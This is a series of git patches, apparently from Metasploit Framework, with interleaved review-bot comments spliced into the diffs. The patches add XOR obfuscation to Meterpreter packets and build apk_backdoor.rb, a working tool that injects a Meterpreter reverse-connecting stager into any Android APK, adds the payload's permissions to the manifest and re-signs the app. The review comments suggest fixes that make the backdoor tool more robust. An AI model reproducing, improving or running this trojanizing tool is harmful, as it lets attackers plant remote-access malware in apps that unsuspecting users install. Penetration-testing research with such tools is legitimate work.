From c747ffc05adda299fdf000be25a20bd71c72e043 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 8 Dec 2015 16:36:26 +1000 Subject: [PATCH 01/71] Implement support for TLV packet XORing, and RECV removal --- lib/rex/post/meterpreter/packet.rb | 38 +++++++++++++++++++ lib/rex/post/meterpreter/packet_dispatcher.rb | 4 +- lib/rex/post/meterpreter/packet_parser.rb | 20 +++++++--- .../post/meterpreter/packet_parser_spec.rb | 2 +- 4 files changed, 55 insertions(+), 9 deletions(-) diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 459fb2d4bb..423f8880d2 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -665,6 +665,44 @@ class Packet < GroupTlv end end + # + # Override the function that creates the raw byte stream for + # sending so that it generates an XOR key, uses it to scramble + # the serialized TLV content, and then returns the key plus the + # scrambled data as the payload. + # + def to_r + raw = super + xor_key = rand(254) + 1 + xor_key |= (rand(254) + 1) << 8 + xor_key |= (rand(255) + 1) << 16 + xor_key |= (rand(255) + 1) << 24 + result = [xor_key].pack('N') + xor_bytes(xor_key, raw) + result + end + + # + # Override the function that reads from a raw byte stream so + # that the XORing of data is included in the process prior to + # passing it on to the default functionality that can parse + # the TLV values. + # + def from_r(bytes) + xor_key = bytes[0,4].unpack('N')[0] + super(xor_bytes(xor_key, bytes[4, bytes.length])) + end + + # + # Xora set of bytes with a given DWORD xor key. + # + def xor_bytes(xor_key, bytes) + result = '' + bytes.bytes.zip([xor_key].pack('V').bytes.cycle).each do |b| + result << (b[0].ord ^ b[1].ord).chr + end + result + end + ## # # Conditionals diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb index cfcd7576fc..bf1a00e80d 100644 --- a/lib/rex/post/meterpreter/packet_dispatcher.rb 
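Review bot: `from_r` reads `bytes[0,4].unpack('N')[0]` without checking that four bytes are present, so a short or empty buffer yields a nil key and the failure surfaces inside `xor_bytes` instead of as a clear parse error. A guard at the top of `from_r`, such as `raise ArgumentError, 'packet shorter than XOR key' if bytes.nil? || bytes.length < 4`, would make that explicit. The doc comment on `to_r` should also state that this is obfuscation and not encryption: the key is prepended in clear to the data it scrambles, so it gives neither confidentiality nor integrity. The key bytes are drawn inconsistently (`rand(254) + 1` for the low two bytes, `rand(255) + 1` for the high two); if the intent is four non-zero bytes, use one expression for all of them. The comment on `xor_bytes` reads `Xora set` as shown here, presumably meant as `XOR a set`.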
+++ b/lib/rex/post/meterpreter/packet_dispatcher.rb @@ -108,8 +108,7 @@ module PacketDispatcher self.last_checkin = Time.now - # If the first 4 bytes are "RECV", return the oldest packet from the outbound queue - if req.body[0,4] == "RECV" + if req.method == 'GET' rpkt = send_queue.shift resp.body = rpkt || '' begin @@ -170,6 +169,7 @@ module PacketDispatcher end end + if bytes.to_i == 0 # Mark the session itself as dead self.alive = false diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb index 8aebe3de39..c4c93d6b37 100644 --- a/lib/rex/post/meterpreter/packet_parser.rb +++ b/lib/rex/post/meterpreter/packet_parser.rb @@ -12,6 +12,11 @@ module Meterpreter ### class PacketParser + # 4 byte xor + # 4 byte length + # 4 byte type + HEADER_SIZE = 12 + # # Initializes the packet parser context with an optional cipher. # @@ -26,7 +31,7 @@ class PacketParser # def reset self.raw = '' - self.hdr_length_left = 8 + self.hdr_length_left = HEADER_SIZE self.payload_length_left = 0 end @@ -34,6 +39,9 @@ class PacketParser # Reads data from the wire and parse as much of the packet as possible. # def recv(sock) + # Create a typeless packet + packet = Packet.new(0) + if (self.hdr_length_left > 0) buf = sock.read(self.hdr_length_left) @@ -49,7 +57,10 @@ class PacketParser # payload length left to the number of bytes # specified in the length if (self.hdr_length_left == 0) - self.payload_length_left = raw.unpack("N")[0] - 8 + xor_key = raw[0, 4].unpack('N')[0] + length_bytes = packet.xor_bytes(xor_key, raw[4, 4]) + # header size doesn't include the xor key, which is always tacked on the front + self.payload_length_left = length_bytes.unpack("N")[0] - (HEADER_SIZE - 4) end elsif (self.payload_length_left > 0) buf = sock.read(self.payload_length_left) 
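Review bot: The `if req.method == 'GET'` branch in the first PacketDispatcher hunk lost its explanatory comment when the RECV check was removed, and nothing replaces it. Add a line such as `# A GET request is a poll: hand back the oldest packet from the outbound queue` above the condition so the protocol convention stays documented. Every GET that reaches this branch now shifts a packet off `send_queue`; whether the request has been tied to a known session before this point is outside the hunk and worth confirming.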
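Review bot: In `PacketParser#recv`, `self.payload_length_left = length_bytes.unpack("N")[0] - (HEADER_SIZE - 4)` trusts a length field read from the socket: a decoded value below 8 makes `payload_length_left` negative, and there is no upper bound on how much the parser will then try to buffer. A negative value appears to leave the parser stuck, since neither the `> 0` read branch nor the later `== 0` completion check would match. The old line had the same gap, but this commit rewrites it and is the natural place for a check such as `raise ArgumentError, 'invalid TLV length' if self.payload_length_left < 0` (or whichever error the callers of `recv` already handle), plus a sane maximum. Separately, `Packet.new(0)` is now allocated on every `recv` call only to reach `xor_bytes`; a module-level helper would avoid that. `recv` starts and ends outside this hunk.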
@@ -67,14 +78,11 @@ class PacketParser if ((self.hdr_length_left == 0) && (self.payload_length_left == 0)) - # Create a typeless packet - packet = Packet.new(0) - # TODO: cipher decryption if (cipher) end - # Serialize the packet from the raw buffer + # Deserialize the packet from the raw buffer packet.from_r(self.raw) # Reset our state diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb index 9ffa2f1a46..af39577024 100644 --- a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb +++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb @@ -20,7 +20,7 @@ describe Rex::Post::Meterpreter::PacketParser do it "should initialise with expected defaults" do parser.send(:raw).should == "" - parser.send(:hdr_length_left).should == 8 + parser.send(:hdr_length_left).should == 12 parser.send(:payload_length_left).should == 0 end From ed49a67c8b4c0fe739e7226debc47bcacce4b966 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 8 Dec 2015 16:59:57 +1000 Subject: [PATCH 02/71] Add .php and .py meterpreter excludes to gitignore --- .gitignore | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.gitignore b/.gitignore index 532dcce24a..e83ddb0b91 100644 --- a/.gitignore +++ b/.gitignore @@ -68,6 +68,8 @@ external/source/exploits/**/Release # Avoid checking in Meterpreter binaries. These are supplied upstream by # the metasploit-payloads gem. data/meterpreter/*.dll +data/meterpreter/*.php +data/meterpreter/*.py data/meterpreter/*.bin data/meterpreter/*.jar data/meterpreter/*.lso From e4e8930ccb1a605e3c53404ff47605a35721e1b4 Mon Sep 17 00:00:00 2001 
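Review bot: The spec change in `packet_parser_spec.rb` only updates the expected default from 8 to 12, and the diffstat shows no other spec touched, so the new `to_r`/`from_r`/`xor_bytes` path and the XOR-decoded length in `recv` land without a test. A round-trip example (`from_r` applied to the output of `to_r` yields the same TLVs) and a parser example fed a 12-byte header would pin the new wire format and catch an endianness or offset slip.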
From: Jack64 Date: Thu, 3 Sep 2015 19:30:25 +0100 Subject: [PATCH 03/71] APK Backdooring script Originally @ https://github.com/rapid7/metasploit-framework/pull/5611/ PR'ed again because I accidentally deleted my fork and couldn't make changes. --- tools/apk_backdoor.rb | 232 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 232 insertions(+) create mode 100644 tools/apk_backdoor.rb diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb new file mode 100644 index 0000000000..cb2ac12298 --- /dev/null +++ b/tools/apk_backdoor.rb 
@@ -0,0 +1,232 @@ +#!/usr/bin/env ruby +# +# This script is a POC for injecting metasploit payloads on +# arbitrary APKs. +# Authored by timwr, Jack64 +# + + +require 'nokogiri' +require 'fileutils' +require 'optparse' + +# Find the activity that is opened when you click the app icon +def find_launcher_activity(amanifest) + package = amanifest.xpath("//manifest").first['package'] + activities = amanifest.xpath("//activity|//activity-alias") + for activity in activities + activityname = activity.attribute("name") + category = activity.search('category') + unless category + next + end + for cat in category + categoryname = cat.attribute('name') + if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') + activityname = activityname.to_s + unless activityname.start_with?(package) + activityname = package + activityname + end + return activityname + end + end + end +end + +# If XML parsing of the manifest fails, recursively search +# the smali code for the onCreate() hook and let the user +# pick the injection point +def scrape_files_for_launcher_activity() + smali_files||=[] + Dir.glob('original/smali*/**/*.smali') do |file| + checkFile=File.read(file) + if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") + smali_files << file + smalifile = file + activitysmali = checkFile + end + end + i=0 + print "[*] Please choose from one of the following:\n" + smali_files.each{|s_file| + print "[+] Hook point ",i,": ",s_file,"\n" + i+=1 + } + hook=-1 + while (hook < 0 || hook>i) + print "\nHook: " + hook = STDIN.gets.chomp.to_i + end + i=0 + smalifile="" + activitysmali="" + smali_files.each{|s_file| + if (i==hook) + checkFile=File.read(s_file) + smalifile=s_file + activitysmali = checkFile + break + end + i+=1 + } + return [smalifile,activitysmali] +end + +def fix_manifest() + payload_permissions=[] + + #Load payload's permissions + File.open("payload/AndroidManifest.xml","r"){|file| + k=File.read(file) + 
payload_manifest=Nokogiri::XML(k) + permissions = payload_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + payload_permissions << name.to_s + end + # print "#{k}" + } + original_permissions=[] + apk_mani='' + + #Load original apk's permissions + File.open("original/AndroidManifest.xml","r"){|file2| + k=File.read(file2) + apk_mani=k + original_manifest=Nokogiri::XML(k) + permissions = original_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + original_permissions << name.to_s + end + # print "#{k}" + } + #Get permissions that are not in original APK + add_permissions=[] + for permission in payload_permissions + if !(original_permissions.include? permission) + print "[*] Adding #{permission}\n" + add_permissions << permission + end + end + inject=0 + new_mani="" + #Inject permissions in original APK's manifest + for line in apk_mani.split("\n") + if (line.include? "uses-permission" and inject==0) + for permission in add_permissions + new_mani << ''+"\n" + end + new_mani << line+"\n" + inject=1 + else + new_mani << line+"\n" + end + end + File.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani } +end + +apkfile = ARGV[0] +unless(apkfile && File.readable?(apkfile)) + puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" + exit(1) +end + +jarsigner = `which jarsigner` +unless(jarsigner && jarsigner.length > 0) + puts "[-] Jarsigner not found. If it's not in your PATH, please add it.\n" + exit(1) +end + +apktool = `which apktool` +unless(apktool && apktool.length > 0) + puts "[-] APKTool not found. 
If it's not in your PATH, please add it.\n" + exit(1) +end + +apk_v=`apktool` +unless(apk_v.split()[1].include?("v2.")) + puts "[-] Apktool version #{apk_v} not supported, please download the latest 2.xx version from git.\n" + exit(1) +end + +begin + msfvenom_opts = ARGV[1,ARGV.length] + opts="" + msfvenom_opts.each{|x| + opts+=x + opts+=" " + } +rescue + puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" + puts "[-] Error parsing msfvenom options. Exiting.\n" + exit(1) +end + + + +print "[*] Generating msfvenom payload..\n" +res=`msfvenom -f raw #{opts} -o payload.apk 2>&1` +if res.downcase.include?("invalid" || "error") + puts res + exit(1) +end + +print "[*] Signing payload..\n" +`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey` + +`rm -rf original` +`rm -rf payload` + +`cp #{apkfile} original.apk` + +print "[*] Decompiling orignal APK..\n" +`apktool d $(pwd)/original.apk -o $(pwd)/original` +print "[*] Decompiling payload APK..\n" +`apktool d $(pwd)/payload.apk -o $(pwd)/payload` + +f = File.open("original/AndroidManifest.xml") +amanifest = Nokogiri::XML(f) +f.close + +print "[*] Locating onCreate() hook..\n" + + +launcheractivity = find_launcher_activity(amanifest) +smalifile = 'original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali' +begin + activitysmali = File.read(smalifile) +rescue Errno::ENOENT + print "[!] Unable to find correct hook automatically\n" + begin + results=scrape_files_for_launcher_activity() + smalifile=results[0] + activitysmali=results[1] + rescue + puts "[-] Error finding launcher activity. 
Exiting" + exit(1) + end +end + +print "[*] Copying payload files..\n" +FileUtils.mkdir_p('original/smali/com/metasploit/stage/') +FileUtils.cp Dir.glob('payload/smali/com/metasploit/stage/Payload*.smali'), 'original/smali/com/metasploit/stage/' +activitycreate = ';->onCreate(Landroid/os/Bundle;)V' +payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" +hookedsmali = activitysmali.gsub(activitycreate, payloadhook) +print "[*] Loading ",smalifile," and injecting payload..\n" +File.open(smalifile, "w") {|file| file.puts hookedsmali } +injected_apk=apkfile.split(".")[0] +injected_apk+="_backdoored.apk" + +print "[*] Poisoning the manifest with meterpreter permissions..\n" +fix_manifest() + +print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" +`apktool b -o $(pwd)/#{injected_apk} $(pwd)/original` +print "[*] Signing #{injected_apk} ..\n" +`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey` + +puts "[+] Infected file #{injected_apk} ready.\n" From 764dc0ceb4f2fe8eb39d330a8d49ee7fad726dca Mon Sep 17 00:00:00 2001 From: Jack64 Date: Sun, 6 Sep 2015 02:02:42 +0100 Subject: [PATCH 04/71] Several fixes - Added tempdir - Fixed msfvenom call (now calling ../msfvenom instead of msfvenom) - Removed backticks for command execution (thanks @bcook-r7) --- tools/apk_backdoor.rb | 95 +++++++++++++++++++++++++------------------ 1 file changed, 55 insertions(+), 40 deletions(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index cb2ac12298..1854e8c29e 100644 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb 
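Review bot: Every external command in this new script is a backtick string with user-supplied values interpolated unquoted, for example `cp #{apkfile} original.apk` and `msfvenom -f raw #{opts} -o payload.apk 2>&1`, so an APK path containing a space or a shell metacharacter is split or interpreted by the shell. Use `FileUtils.cp(apkfile, 'original.apk')` for the copy and argument arrays for the rest (e.g. `Open3.capture2e('msfvenom', '-f', 'raw', *msfvenom_opts, '-o', 'payload.apk')` after `require 'open3'`). The later patches in this series that introduce `run_cmd` keep the single-string form and have the same problem. Also, `res.downcase.include?("invalid" || "error")` evaluates `"invalid" || "error"` to `"invalid"` first, so output containing only "error" is never caught. Finally, `rm -rf original` and `rm -rf payload` delete whatever directories of those names exist in the current working directory.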
@@ -5,10 +5,22 @@ # Authored by timwr, Jack64 # - +require 'tmpdir' require 'nokogiri' require 'fileutils' require 'optparse' +require 'open3' + + +def run_cmd(cmd) + begin + stdin, stdout, stderr = Open3.popen3(cmd) + return stdout.read + stderr.read + rescue Errno::ENOENT + return nil + end +end + # Find the activity that is opened when you click the app icon def find_launcher_activity(amanifest) @@ -36,9 +48,10 @@ end # If XML parsing of the manifest fails, recursively search # the smali code for the onCreate() hook and let the user # pick the injection point -def scrape_files_for_launcher_activity() + +def scrape_files_for_launcher_activity(tempdir) smali_files||=[] - Dir.glob('original/smali*/**/*.smali') do |file| + Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| checkFile=File.read(file) if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") smali_files << file @@ -72,11 +85,11 @@ def scrape_files_for_launcher_activity() return [smalifile,activitysmali] end -def fix_manifest() +def fix_manifest(tempdir) payload_permissions=[] - + #Load payload's permissions - File.open("payload/AndroidManifest.xml","r"){|file| + File.open("#{tempdir}/payload/AndroidManifest.xml","r"){|file| k=File.read(file) payload_manifest=Nokogiri::XML(k) permissions = payload_manifest.xpath("//manifest/uses-permission") @@ -84,13 +97,13 @@ def fix_manifest() name=permission.attribute("name") payload_permissions << name.to_s end - # print "#{k}" } + original_permissions=[] - apk_mani='' - + apk_mani="" + #Load original apk's permissions - File.open("original/AndroidManifest.xml","r"){|file2| + File.open("#{tempdir}/original/AndroidManifest.xml","r"){|file2| k=File.read(file2) apk_mani=k original_manifest=Nokogiri::XML(k) @@ -99,8 +112,8 @@ def fix_manifest() name=permission.attribute("name") original_permissions << name.to_s end - # print "#{k}" } + #Get permissions that are not in original APK add_permissions=[] for permission in payload_permissions 
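Review bot: `run_cmd` calls `Open3.popen3(cmd)` without a block, never closes `stdin`, `stdout` or `stderr`, and never waits on the child. It also drains `stdout` completely before touching `stderr`, which can block forever if the child fills the stderr pipe first. `Open3.capture2e` does the reading, closing and waiting in one call and merges the two streams: `output, _status = Open3.capture2e(cmd)` followed by `output`. Returning nil only on `Errno::ENOENT` also means a command that runs and fails looks the same as one that succeeds; checking `_status.success?` would let callers tell them apart.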
@@ -109,6 +122,7 @@ def fix_manifest() add_permissions << permission end end + inject=0 new_mani="" #Inject permissions in original APK's manifest @@ -123,29 +137,29 @@ def fix_manifest() new_mani << line+"\n" end end - File.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani } + File.open("#{tempdir}/original/AndroidManifest.xml", "w") {|file| file.puts new_mani } end apkfile = ARGV[0] unless(apkfile && File.readable?(apkfile)) puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" + puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" exit(1) end -jarsigner = `which jarsigner` -unless(jarsigner && jarsigner.length > 0) +jarsigner = run_cmd("jarsigner") +unless(jarsigner != nil) puts "[-] Jarsigner not found. If it's not in your PATH, please add it.\n" exit(1) end -apktool = `which apktool` -unless(apktool && apktool.length > 0) +apktool = run_cmd("apktool") +unless(apktool != nil) puts "[-] APKTool not found. If it's not in your PATH, please add it.\n" exit(1) end -apk_v=`apktool` +apk_v = apktool unless(apk_v.split()[1].include?("v2.")) puts "[-] Apktool version #{apk_v} not supported, please download the latest 2.xx version from git.\n" exit(1) 
@@ -160,48 +174,45 @@ begin } rescue puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" + puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" puts "[-] Error parsing msfvenom options. Exiting.\n" exit(1) end - +#Create temporary directory where work will be done +tempdir = Dir.mktmpdir print "[*] Generating msfvenom payload..\n" -res=`msfvenom -f raw #{opts} -o payload.apk 2>&1` +res = run_cmd("../msfvenom -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") if res.downcase.include?("invalid" || "error") puts res exit(1) end -print "[*] Signing payload..\n" -`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey` +print "[*] Signing payload..\n" +run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/payload.apk androiddebugkey") -`rm -rf original` -`rm -rf payload` - -`cp #{apkfile} original.apk` +run_cmd("cp #{apkfile} #{tempdir}/original.apk") print "[*] Decompiling orignal APK..\n" -`apktool d $(pwd)/original.apk -o $(pwd)/original` +run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") print "[*] Decompiling payload APK..\n" -`apktool d $(pwd)/payload.apk -o $(pwd)/payload` - -f = File.open("original/AndroidManifest.xml") +run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") + +f = File.open("#{tempdir}/original/AndroidManifest.xml") amanifest = Nokogiri::XML(f) f.close print "[*] Locating onCreate() hook..\n" - launcheractivity = find_launcher_activity(amanifest) -smalifile = 'original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali' +smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" begin activitysmali = File.read(smalifile) rescue Errno::ENOENT print "[!] 
Unable to find correct hook automatically\n" begin - results=scrape_files_for_launcher_activity() + results=scrape_files_for_launcher_activity(tempdir) smalifile=results[0] activitysmali=results[1] rescue @@ -211,8 +222,8 @@ rescue Errno::ENOENT end print "[*] Copying payload files..\n" -FileUtils.mkdir_p('original/smali/com/metasploit/stage/') -FileUtils.cp Dir.glob('payload/smali/com/metasploit/stage/Payload*.smali'), 'original/smali/com/metasploit/stage/' +FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") +FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" activitycreate = ';->onCreate(Landroid/os/Bundle;)V' payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" hookedsmali = activitysmali.gsub(activitycreate, payloadhook) @@ -222,11 +233,15 @@ injected_apk=apkfile.split(".")[0] injected_apk+="_backdoored.apk" print "[*] Poisoning the manifest with meterpreter permissions..\n" -fix_manifest() +fix_manifest(tempdir) print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" -`apktool b -o $(pwd)/#{injected_apk} $(pwd)/original` -print "[*] Signing #{injected_apk} ..\n" -`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey` +run_cmd("apktool b -o #{tempdir}/#{injected_apk} #{tempdir}/original") +print "[*] Signing #{injected_apk} ..\n" +run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/#{injected_apk} androiddebugkey") + +run_cmd("cp #{tempdir}/#{injected_apk} .") +FileUtils.remove_entry tempdir puts "[+] Infected file #{injected_apk} ready.\n" + From 18e0a2f8966f9ac7032cf91300a03f01c78e8198 Mon Sep 17 00:00:00 2001 
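Review bot: `tempdir = Dir.mktmpdir` is cleaned up only by the `FileUtils.remove_entry tempdir` at the very end of the script. Every `exit(1)` after its creation (the msfvenom error check, the launcher-activity rescue) and any unhandled exception therefore leaves the generated payload and the decompiled APK behind in the temp directory. Use the block form, `Dir.mktmpdir do |tempdir| ... end`, or move the removal into an `ensure`, so the directory is removed on every path; `exit` raises `SystemExit`, so an `ensure` still runs.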
From: Jack64 Date: Sun, 6 Sep 2015 02:34:33 +0100 Subject: [PATCH 05/71] Update apk_backdoor.rb fixed msfvenom path resolution --- tools/apk_backdoor.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index 1854e8c29e..f280520064 100644 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb @@ -183,7 +183,8 @@ end tempdir = Dir.mktmpdir print "[*] Generating msfvenom payload..\n" -res = run_cmd("../msfvenom -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") +msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "msfvenom")) +res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") if res.downcase.include?("invalid" || "error") puts res exit(1) From 719b333e96fa24d92cc293abf411dd9977342e93 Mon Sep 17 00:00:00 2001 From: Tim Date: Sat, 26 Sep 2015 18:41:58 +0100 Subject: [PATCH 06/71] chmod +x tools/apk_backdoor.rb --- tools/apk_backdoor.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 tools/apk_backdoor.rb diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb old mode 100644 new mode 100755 From 322382060561e7eaddc7ed640c09a6f4ff05497e Mon Sep 17 00:00:00 2001 From: Tim Date: Sat, 26 Sep 2015 19:08:06 +0100 Subject: [PATCH 07/71] fix tools/apk_backdoor.rb output file --- tools/apk_backdoor.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index f280520064..aa311f713b 100755 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb 
@@ -230,18 +230,16 @@ payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/ hookedsmali = activitysmali.gsub(activitycreate, payloadhook) print "[*] Loading ",smalifile," and injecting payload..\n" File.open(smalifile, "w") {|file| file.puts hookedsmali } -injected_apk=apkfile.split(".")[0] -injected_apk+="_backdoored.apk" +injected_apk=apkfile.split(".")[0] + "_backdoored.apk" print "[*] Poisoning the manifest with meterpreter permissions..\n" fix_manifest(tempdir) print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" -run_cmd("apktool b -o #{tempdir}/#{injected_apk} #{tempdir}/original") +run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") print "[*] Signing #{injected_apk} ..\n" -run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/#{injected_apk} androiddebugkey") +run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") -run_cmd("cp #{tempdir}/#{injected_apk} .") FileUtils.remove_entry tempdir puts "[+] Infected file #{injected_apk} ready.\n" From e5fb67f430e2138f7e4a6adc4f07bccee8c9e2cf Mon Sep 17 00:00:00 2001 From: Tim Date: Sat, 26 Sep 2015 19:15:23 +0100 Subject: [PATCH 08/71] fix version check > 2.0.1 --- tools/apk_backdoor.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index aa311f713b..1e81f5e885 100755 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb 
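Review bot: `injected_apk=apkfile.split(".")[0] + "_backdoored.apk"` cuts the input at the first dot anywhere in the path, so `./app.apk` gives an empty stem and `com.example.app.apk` gives `com_backdoored.apk`. Strip only the extension instead: `injected_apk = apkfile.sub(/\.apk\z/i, '') + '_backdoored.apk'`. Now that the output is written directly to this path rather than into `tempdir`, an unexpected stem also decides where in the filesystem the file lands, so the result is worth printing before `apktool b` runs.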
@@ -149,19 +149,19 @@ end jarsigner = run_cmd("jarsigner") unless(jarsigner != nil) - puts "[-] Jarsigner not found. If it's not in your PATH, please add it.\n" + puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" exit(1) end -apktool = run_cmd("apktool") +apktool = run_cmd("apktool -version") unless(apktool != nil) - puts "[-] APKTool not found. If it's not in your PATH, please add it.\n" + puts "[-] apktool not found. If it's not in your PATH, please add it.\n" exit(1) end -apk_v = apktool -unless(apk_v.split()[1].include?("v2.")) - puts "[-] Apktool version #{apk_v} not supported, please download the latest 2.xx version from git.\n" +apk_v = Gem::Version.new(apktool) +unless(apk_v >= Gem::Version.new('2.0.1')) + puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" exit(1) end From ab4ebe155dd6d7060bd8ff4e617338c9a46824da Mon Sep 17 00:00:00 2001 From: Tim Date: Sun, 27 Sep 2015 12:20:04 +0100 Subject: [PATCH 09/71] placate msftidy --- tools/apk_backdoor.rb | 290 +++++++++++++++++++++--------------------- 1 file changed, 145 insertions(+), 145 deletions(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index 1e81f5e885..18401b380d 100755 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb @@ -1,6 +1,6 @@ #!/usr/bin/env ruby # -# This script is a POC for injecting metasploit payloads on +# This script is a POC for injecting metasploit payloads on # arbitrary APKs. # Authored by timwr, Jack64 # 
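Review bot: `Gem::Version.new(apktool)` is given the raw return value of `run_cmd`, which is stdout and stderr concatenated, and it raises `ArgumentError` on anything that is not a bare version string. A warning line from the JVM or the wrapper script therefore turns the version check into an unhandled exception. Extract the version first and handle the no-match case, e.g. `ver = apktool[/\d+(\.\d+)+/]` and then `unless ver && Gem::Version.new(ver) >= Gem::Version.new('2.0.1')`. The error message should then print `ver`, or the raw output when nothing matched.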
@@ -13,36 +13,36 @@ require 'open3' def run_cmd(cmd) - begin - stdin, stdout, stderr = Open3.popen3(cmd) - return stdout.read + stderr.read - rescue Errno::ENOENT - return nil - end + begin + stdin, stdout, stderr = Open3.popen3(cmd) + return stdout.read + stderr.read + rescue Errno::ENOENT + return nil + end end # Find the activity that is opened when you click the app icon def find_launcher_activity(amanifest) - package = amanifest.xpath("//manifest").first['package'] - activities = amanifest.xpath("//activity|//activity-alias") - for activity in activities - activityname = activity.attribute("name") - category = activity.search('category') - unless category - next - end - for cat in category - categoryname = cat.attribute('name') - if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') - activityname = activityname.to_s - unless activityname.start_with?(package) - activityname = package + activityname - end - return activityname - end - end + package = amanifest.xpath("//manifest").first['package'] + activities = amanifest.xpath("//activity|//activity-alias") + for activity in activities + activityname = activity.attribute("name") + category = activity.search('category') + unless category + next end + for cat in category + categoryname = cat.attribute('name') + if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') + activityname = activityname.to_s + unless activityname.start_with?(package) + activityname = package + activityname + end + return activityname + end + end + end end # If XML parsing of the manifest fails, recursively search 
